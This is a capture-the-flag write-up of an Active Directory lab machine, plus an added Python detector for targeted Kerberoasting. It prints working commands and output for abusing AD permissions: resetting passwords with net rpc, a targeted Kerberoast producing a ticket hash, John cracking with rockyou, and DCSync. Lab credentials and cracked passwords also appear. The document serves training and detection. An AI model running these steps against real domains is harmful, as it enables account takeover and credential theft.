Machine Name    Difficulty    Date Started    Date Completed
Administrator   Medium        11/04/2025      11/04/2025


Learning Points:

  • Practiced password hash cracking using John and pwsafe2john.

Attack Path:

  • Assumed breach with user olivia, enumerated AD using BloodHound.
  • Identified and abused GenericAll permission to reset michael’s password.
  • Used michael to reset benjamin’s password via ForceChangePassword.
  • Logged in as benjamin via FTP, retrieved and cracked a psafe3 vault.
  • Extracted emily’s credentials and accessed the target machine using Evil-WinRM.
  • Performed a targeted Kerberoast attack on ethan using GenericWrite, cracked the hash.
  • Abused DCSync with ethan, dumped administrator hashes using secretsdump.
  • Logged in as administrator, completed the machine.

We were provided with credentials to perform this as an assumed breach scenario. The user we were given didn’t have access to any specific file shares.

We ran BloodHound (Python version) and were able to enumerate the AD further.

The olivia user had GenericAll, but we were not able to abuse that permission.

We enumerated other paths and identified the following attack path:

We performed a targeted Kerberoast attack on the michael user but failed.

By abusing the GenericAll permission, we changed the password of the michael user using olivia:

net rpc password "michael" "newP@ssword2022" -U "administrator.htb"/"olivia"%"ichliebedich" -S "10.10.11.42"

We then abused the ForceChangePassword permission in the same way using the michael account and gained access to the benjamin user.

We used FTP to log in to the server as the benjamin user and retrieved an encrypted psafe3 file:

We cracked the hash using pwsafe2john and retrieved the master password of the vault.

We obtained the password of the emily user and used Evil-WinRM to log in to the machine and retrieve the user flag.


Privilege Escalation

We enumerated more attack paths from the emily user and identified the following path:

We abused GenericWrite by performing a targeted Kerberoast attack and obtained the hash of the ethan user.

┌──(root㉿falcon)-[/home/destiny/shared/tools-backup/targetedKerberoast]
└─# timedatectl set-ntp off

┌──(root㉿falcon)-[/home/destiny/shared/tools-backup/targetedKerberoast]
└─# rdate -n administrator.htb
Fri Apr 11 20:58:51 +0530 2025

┌──(root㉿falcon)-[/home/destiny/shared/tools-backup/targetedKerberoast]
└─# python3 targetedKerberoast.py -v -d 'administrator.htb' -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[VERBOSE] SPN added successfully for (ethan)
[+] Printing hash for (ethan)
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$51893f5b4fd3<SNIP>6343344b67f3e85077cbbe1354ad21128b5048316075f7138
[VERBOSE] SPN removed successfully for (ethan)
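
From the defender's side, the sequence above leaves a recognisable trace: an SPN is written to the target account, an RC4 (etype 0x17) service ticket is requested for it, and the SPN is removed again seconds later. The following added example (not part of the original writeup) correlates constructed, simplified Windows 5136 and 4769 events to flag that pattern; the field names and timestamps are assumptions for illustration, not the raw Windows schema.

```python
"""Flag the targeted-Kerberoast pattern: SPN added, RC4 TGS requested, SPN removed.
Added example with constructed events; field names are simplified, not the raw
Windows event XML (5136 = directory object modified, 4769 = TGS requested)."""
from datetime import datetime, timedelta

# Constructed sample events (not real log data). The first three model the
# add / roast / remove sequence against ethan; the rest are benign noise.
EVENTS = [
    {"id": 5136, "ts": "2025-04-11T20:58:51", "object": "ethan",
     "attr": "servicePrincipalName", "op": "add", "subject": "emily"},
    {"id": 4769, "ts": "2025-04-11T20:58:52", "service": "ethan",
     "etype": "0x17", "subject": "emily"},
    {"id": 5136, "ts": "2025-04-11T20:58:53", "object": "ethan",
     "attr": "servicePrincipalName", "op": "delete", "subject": "emily"},
    {"id": 4769, "ts": "2025-04-11T20:59:10", "service": "krbtgt",
     "etype": "0x12", "subject": "olivia"},          # AES TGS, normal
    {"id": 5136, "ts": "2025-04-11T20:30:00", "object": "svc_sql",
     "attr": "servicePrincipalName", "op": "add", "subject": "admin"},  # never removed
]

def _t(ev):
    return datetime.fromisoformat(ev["ts"])

def _spn_change(ev, op):
    return ev["id"] == 5136 and ev["attr"] == "servicePrincipalName" and ev["op"] == op

def find_targeted_kerberoast(events, window=timedelta(minutes=5)):
    """Return one alert per account whose SPN was added and then deleted within
    `window`, with an RC4 (etype 0x17) TGS request for that account in between."""
    events = sorted(events, key=_t)
    alerts = []
    for add in (e for e in events if _spn_change(e, "add")):
        start = _t(add)
        deletes = [e for e in events if _spn_change(e, "delete")
                   and e["object"] == add["object"]
                   and start <= _t(e) <= start + window]
        if not deletes:
            continue                       # long-lived SPN: ordinary provisioning
        end = _t(deletes[0])
        roasted = any(e["id"] == 4769 and e["service"] == add["object"]
                      and e["etype"] == "0x17" and start <= _t(e) <= end
                      for e in events)
        if roasted:
            alerts.append({"target": add["object"], "subject": add["subject"],
                           "lifetime_s": (end - start).total_seconds()})
    return alerts

if __name__ == "__main__":
    for alert in find_targeted_kerberoast(EVENTS):
        print(alert)
```

In a real environment the 5136 events require SACL auditing on the user objects, and the short SPN lifetime is the strongest signal since legitimate SPN changes are rarely reverted within seconds.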

We cracked the hash using John and obtained the password:

┌──(destiny㉿falcon)-[~/shared/tools-backup/targetedKerberoast]
└─$ john ethan.txt --wordlist=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
limpbizkit       (?)     
1g 0:00:00:00 DONE (2025-04-11 21:00) 100.0g/s 819200p/s 819200c/s 819200C/s newzealand..total90
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

We used impacket-secretsdump to abuse the DCSync permission and obtained the administrator hash.

We performed a pass-the-hash attack with that hash and successfully logged in as root to complete the machine.